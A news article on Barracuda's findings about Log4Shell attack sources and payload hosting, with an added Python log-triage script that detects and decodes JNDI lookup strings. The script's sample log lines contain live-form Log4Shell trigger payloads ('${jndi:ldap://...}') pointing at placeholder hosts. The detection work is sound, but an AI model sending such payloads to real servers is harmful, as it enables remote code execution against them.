Given the popularity of Log4j, a Java-based logging audit framework within Apache, researchers at Barracuda, a trusted partner and leading provider of cloud-focused security solutions, have identified attacks targeting its vulnerabilities, and these attacks have remained stable since December 10, 2021. Researchers found that 83% of attacks were carried out from IP addresses in the United States, with half of these IP addresses associated with AWS, Azure and other data centers. Meanwhile, 10% of attacks were carried out from IP addresses in Japan, 3% in Germany, 3% in the Netherlands and 1% in Russia.
While these IP addresses only performed the scans and intrusion attempts, the actual payloads were delivered by other compromised websites or VPS hosts after the attack went through. The IP addresses of the hosts carrying the payloads are typically obfuscated using Base64 encoding.
Log4j is a Java-based logging audit framework; it is an Apache project and is used in almost all internet and intranet services. Its new vulnerability allows hackers to carry out remote code execution (RCE) attacks on a target system. These attacks are very easy to perform for anyone aware of how they work.
Attackers who control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The vulnerability affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, which are used by numerous organizations such as Apple, Amazon, Cloudflare, Twitter, Steam, and others. It is triggered by sending a specific string to Log4j software, which makes it easy to exploit, and the wide use of this software means there are multiple attack vectors.
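The following Python script is an added illustration, not code from Barracuda's research or the original article. It scans access-log lines for the `${jndi:...}` lookup string that triggers the vulnerability, separates the scanning source IP from the callback host named in the lookup, and decodes Base64 path segments of the kind used to hide payload hosts. The log format, sample lines and addresses are constructed, and the script assumes the lookup appears in plain or URL-encoded form.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Plain-form JNDI lookup: captures scheme, callback host[:port] and path.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)(/[^\s}]*)?\}", re.I)

def decode_b64_segments(path):
    """Return printable ASCII recovered from Base64-looking path segments."""
    found = []
    for seg in path.split("/"):
        if len(seg) < 8 or not re.fullmatch(r"[A-Za-z0-9+_-]+=*", seg):
            continue
        try:
            padded = seg + "=" * (-len(seg) % 4)
            text = base64.urlsafe_b64decode(padded).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append(text)
    return found

def triage(log_lines):
    """Return one finding per JNDI lookup found in access-log lines."""
    findings = []
    for line in log_lines:
        for m in JNDI_RE.finditer(unquote(line)):  # also catches %24%7B...
            findings.append({
                "scanner_ip": line.split()[0],      # host that sent the request
                "scheme": m.group(1).lower(),
                "callback_host": m.group(2),        # where the lookup points
                "decoded": decode_b64_segments(m.group(3) or ""),
            })
    return findings

# Constructed sample data; all addresses are documentation ranges.
B64 = base64.urlsafe_b64encode(b"203.0.113.99:8080").decode()
LOOKUP = quote("${jndi:ldap://203.0.113.21/x/" + B64 + "}", safe="")
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://203.0.113.20:1389/a}"',
    f'198.51.100.8 - - [12/Dec/2021:10:01:09 +0000] "GET /?q={LOOKUP} HTTP/1.1" 404 0',
    '192.0.2.44 - - [12/Dec/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
```

Blocking or alerting on the callback and decoded hosts, not only the scanner IPs, covers the hosts that actually serve the payload.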
Sharing his thoughts on such attacks, Tushar Richabadas, Senior Product Marketing Manager, Applications and Cloud Security, Barracuda, said, “The Log4j vulnerability has taken the cyber world by storm. The best way to protect against Log4Shell specifically is to upgrade to the latest version of Log4j software so that vulnerabilities are patched in a timely manner. Due to the increasing number of vulnerabilities found in web applications, it is becoming increasingly complex to protect against attacks. However, all-in-one solutions are now available to protect web applications from being exploited due to these vulnerabilities. WAF/WAF-as-a-Service solutions, also known as Web Application and API Protection (WAAP) services, can help protect web applications by providing all the latest security solutions in one easy-to-use product.”